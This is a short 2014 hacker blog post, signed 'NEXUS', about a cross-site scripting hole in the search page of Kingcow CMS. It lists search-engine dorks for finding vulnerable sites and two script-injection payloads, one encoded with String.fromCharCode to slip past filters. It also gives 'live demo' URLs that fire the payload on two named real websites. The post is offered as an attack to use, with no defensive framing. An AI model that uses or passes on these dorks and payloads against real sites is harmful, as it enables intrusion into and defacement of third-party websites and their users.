Tuesday, 1 July 2014

Kingcow CMS Cross Site Scripting

Dorks:
inurl:"search.php?for="
intext:"Powered by Central" 
* for parameter in search.php is VULNERABLE to XSS..

Exploits:
"><script>alert('HaCked_By_NEXUS');</script>&search_submit=Search
Or if you can't use normal script.. Change it from string to character: 
"><script>alert(String.fromCharCode(72, 97, 67, 107, 101, 100, 32, 66, 121, 32, 78, 69, 88, 85, 83, 32, 33));</script>&search_submit=Search
 These char "String.fromCharCode(72, 97, 67, 107, 101, 100, 32, 66, 121, 32, 78, 69, 88, 85, 83, 32, 33)" is "HaCked By NEXUS !" using Hack Bar of Firefox...



If you dont have that "Hack Bar" .. Download it from :
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
Live Demo:
http://hdmixtapes.com/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E&search_submit=Search
http://artnews.org/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083%29%29;%3C/script%3E&search_submit=Search
NEXUS